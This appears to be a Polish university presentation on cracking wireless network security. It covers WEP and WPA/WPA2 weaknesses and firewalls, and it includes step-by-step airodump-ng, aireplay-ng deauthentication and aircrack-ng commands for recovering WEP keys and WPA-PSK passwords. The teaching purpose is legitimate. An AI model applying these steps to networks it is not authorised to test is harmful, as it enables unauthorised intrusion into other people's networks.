background image

Łamanie 
zabezpieczeń 
sieci 
bezprzewodowyc
h

Adrian Kabała

Krakowska Akademia

im. Andrzeja Frycza Modrzewskiego 

Kierunek: Informatyka i ekonometria

Promotor: prof. zw. Dr hab. Tadeusza Grabińskiego

background image

Bezpieczeństwo w sieci 
Internet

jest bardzo ważnym aspektem użytkowania 

Internetu. 

Zagrożenia płynące z Internetu – metody ataków:

Ataki z zewnątrz sieci lokalnej 

(DoS, wirusy, XSS, 

penetracja poprzez sieć bezprzewodową)

Ataki z wnętrza sieci lokalnej 

(ARP, RARP)

Klasy ataków:

Ataki pasywne – podsłuchiwanie

Ataki aktywne – modyfikacja i spreparowanie danych

background image

Ochrona poprzez Firewall

Blokowanie dostępu do usług i komponentów dla osób, 

które nie powinny mieć do nich dostępu

Ochrona systemów przed atakami na dziurawe 

oprogramowanie sieciowe

Ochrona dziurawych systemów operacyjnych

Zapobieganie podsłuchiwaniu oraz wyciekom informacji 

z sieci wew.

Ochrona przed fałszowaniem adresów IP

Wydzielanie fragmentów sieci o zróżnicowanym 

poziomie bezpieczeństwa

background image

Typy firewalli

a)

Zapory lokalne

b)

Zapory filtrujące

c)

Zapory proxy

background image

Bezpieczeństwo sieci WEP

WEP 

(1997r.)

2001 – Pierwszy artukuł FMS. 

2002 – Udoskonalenie o kolejne bajty 

obliczeń

2004 – KoreK

Algorytm RC4

Zarządzanie kluczami KSA 

Produkowanie strumienia szyfrującego 

PRGA

background image

Uwierzytelnianie w WEP

1. Uwierzytelnianie otwarte (OSA)

2. Uwierzytelnianie kluczem współdzielonym (SKA)

3. Weryfikacja MAC

background image

Słabość WEP

Tylko 16777216 różnych możliwych wartości 
IV

Obecność słabych wartości IV

Inicjalizacja resetuje sekwencje wektora IV

Chop-Chop

background image

Atak na sieć WEP 

airodump-ng wlan0

airodump-ng -c 1 –bssid 
00:16:B6:D9:58:71 wlan0 –w nazwa_pliku

aireplay-ng -0 1 –a 00:16:b6:d9:58:71 –c 
00:60:b3:d4:51:f3 wlan0

aircrack-ng /root/testka/test-01.cap

Hasło: A1:A2:A3:A4:A5

background image

Bezpieczeństwo sieci WPA i 

WPA2

WPA (2003 r.) WPA2(2004r.)

•Personal  (TKIP, CCMP)

•Enterprise - Radius

background image

Zarządzanie 
kluczami i 
uwierzytelnian
ie

PMK – klucz główny
PTK – dla TKIP: 2 x EAPOL, TEK, 
MIC.
PTK – dla CCMP: – 2 x EAPOL, 
TK

background image

Słabość WPA i WPA2

PMK = PBKDF2 (hasło, SSID, ssidLength, 4096, 

256)

PTK = HMAC, 2x MAC, 2x ID Nonces

background image

Tablice tęczowe

• Szybkość
• Oszczędność mocy obliczeniowej
• Duża ilość haseł
• Słaba dostępność

background image

Atak na sieć WPA/WPA2-PSK

1.

Backtrack

2.

airodump-ng mon0

3.

airodump-ng –c 6 -–bbsid 00:1E:E5:99:08:78 
 –w /root/armagedon mon0

4.

  aireplay-ng –0 1 -a 00:1E:E5:99:08:78 –c 
2:E0:2C:5E:4F:DB  mon0

5.

  aircrack-ng –w słownik.txt –b 
00:1E:E5:99:08:78 /root/Armagedon-01.cap

background image

WiFite – łatwiej się nie da.

Atak Wi-Fi Protected Setup

Skrypt pobierający hasła

background image

Dziękuję za uwagę


Document Outline